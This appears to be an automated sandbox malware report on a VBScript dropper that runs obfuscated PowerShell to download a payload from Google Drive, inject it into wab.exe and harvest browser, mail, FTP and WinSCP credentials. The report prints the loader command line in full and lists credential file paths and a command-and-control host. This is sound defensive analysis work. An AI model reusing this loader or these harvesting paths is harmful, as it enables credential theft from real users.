            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00623675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,10_2_00623675
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match, File source: 00000009.00000002.2957213484.0000000022E8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.2957213484.0000000022EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: wab.exe PID: 5440, type: MEMORYSTR
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\FTP Navigator\Ftplist.txt
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: Yara match, File source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: wab.exe PID: 5440, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match, File source: 00000009.00000002.2957213484.0000000022E8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.2957213484.0000000022EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: wab.exe PID: 5440, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information221
            Scripting
            Valid Accounts231
            Windows Management Instrumentation
            221
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            111
            Process Injection
            2
            Obfuscated Files or Information
            1
            Credentials in Registry
            1
            File and Directory Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts112
            Command and Scripting Interpreter
            1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            Software Packing
            Security Account Manager35
            System Information Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login HookLogin Hook1
            Timestomp
            NTDS1
            Query Registry
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets641
            Security Software Discovery
            SSHKeylogging13
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials1
            Process Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items361
            Virtualization/Sandbox Evasion
            DCSync361
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Hidden Files and Directories
            /etc/passwd and /etc/shadow1
            System Network Configuration Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Rundll32
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Behavior Graph ID: 1430859, Sample: Umulighed.vbs, Startdate: 24/04/2024, Architecture: WINDOWS, Score: 100
            Root (Umulighed.vbs): contacts mail.cash4cars.nz, ip-api.com and 2 other IPs or domains; signatures: Found malware configuration, Malicious sample detected (through community Yara rule), Antivirus detection for URL or domain, 7 other signatures; starts wscript.exe, newfile.exe, newfile.exe, rundll32.exe
            wscript.exe: signatures: VBScript performs obfuscated calls to suspicious functions, Suspicious powershell command line found, Wscript starts Powershell (via cmd or directly), 3 other signatures; starts powershell.exe
            powershell.exe: contacts drive.google.com (142.251.2.101, 443, 49730, 49737, GOOGLEUS, United States) and drive.usercontent.google.com (142.251.2.132, 443, 49731, 49738, GOOGLEUS, United States); signatures: Suspicious powershell command line found, Very long command line found, Found suspicious powershell code related to unpacking or dynamic code loading; starts powershell.exe, conhost.exe, cmd.exe
            powershell.exe (child): signatures: Writes to foreign memory regions, Found suspicious powershell code related to unpacking or dynamic code loading, Hides threads from debuggers; starts wab.exe, cmd.exe
            wab.exe: contacts mail.cash4cars.nz (114.142.162.17, 26, 49740, SERVERMULE-AS-APNimbus2PtyLtdAU, Australia) and ip-api.com (208.95.112.1, 49739, 80, TUT-ASUS, United States); dropped C:\Users\user\AppData\Roaming\...\newfile.exe (PE32); signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc), Tries to steal Mail credentials (via file / registry access), Tries to detect sandboxes and other dynamic analysis tools (process name or module or function), 4 other signatures

            Source | Detection | Scanner | Label | Link
            Umulighed.vbs | 5% | ReversingLabs | Win32.Dropper.Generic |
            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\newfile\newfile.exe | 0% | ReversingLabs | |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
            https://go.micro | 0% | URL Reputation | safe |
            https://contoso.com/License | 0% | URL Reputation | safe |
            https://contoso.com/Icon | 0% | URL Reputation | safe |
            http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
            http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
            https://contoso.com/ | 0% | URL Reputation | safe |
            http://r3.o.lencr.org0 | 0% | URL Reputation | safe |
            http://mail.cash4cars.nz | 0% | Avira URL Cloud | safe |
            http://r3.i.lencr.org/0R | 0% | Avira URL Cloud | safe |
            https://drive.usercontent.googh | 0% | Avira URL Cloud | safe |
            https://drive.googP | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            mail.cash4cars.nz | 114.142.162.17 | true | true | | unknown
            drive.google.com | 142.251.2.101 | true | false | | high
            drive.usercontent.google.com | 142.251.2.132 | true | false | | high
            ip-api.com | 208.95.112.1 | true | false | | high
            Name | Malicious | Antivirus Detection | Reputation
            http://ip-api.com/line/?fields=hosting | false | | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2261833973.00000221E3970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://r3.i.lencr.org/0R | wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://mail.cash4cars.nz | wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://drive.usercontent.google.com | powershell.exe, 00000001.00000002.2122412787.00000221D3E51000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://go.micro | powershell.exe, 00000001.00000002.2122412787.00000221D448E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://contoso.com/License | powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://contoso.com/Icon | powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://drive.googP | powershell.exe, 00000001.00000002.2122412787.00000221D5AF4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://drive.usercontent.googh | powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://drive.usercontent.google.com/ | wab.exe, 00000009.00000002.2943582396.0000000007261000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://drive.google.com | powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://www.google.com | powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://drive.google.com/ | wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://x1.c.lencr.org/0 | wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://x1.i.lencr.org/0 | wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://contoso.com/ | powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2261833973.00000221E3970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://ip-api.com | wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://r3.o.lencr.org0 | wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://drive.google.com | powershell.exe, 00000001.00000002.2122412787.00000221D5A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3B27000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://drive.usercontent.google.com | powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.2122412787.00000221D3901000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://apis.google.com | powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://drive.google.com/i | wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2122412787.00000221D3901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992852732.0000000004911000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://aka.ms/pscore6lBtq | powershell.exe, 00000004.00000002.1992852732.0000000004911000.00000004.00000800.00020000.00000000.sdmp | false | | high
            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
            208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | false
            114.142.162.17 | mail.cash4cars.nz | Australia | | 133525 | SERVERMULE-AS-APNimbus2PtyLtdAU | true
            142.251.2.132 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
            142.251.2.101 | drive.google.com | United States | | 15169 | GOOGLEUS | false
                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1430859
                                                        Start date and time:2024-04-24 10:11:07 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 23s
                                                        Hypervisor based Inspection enabled:false
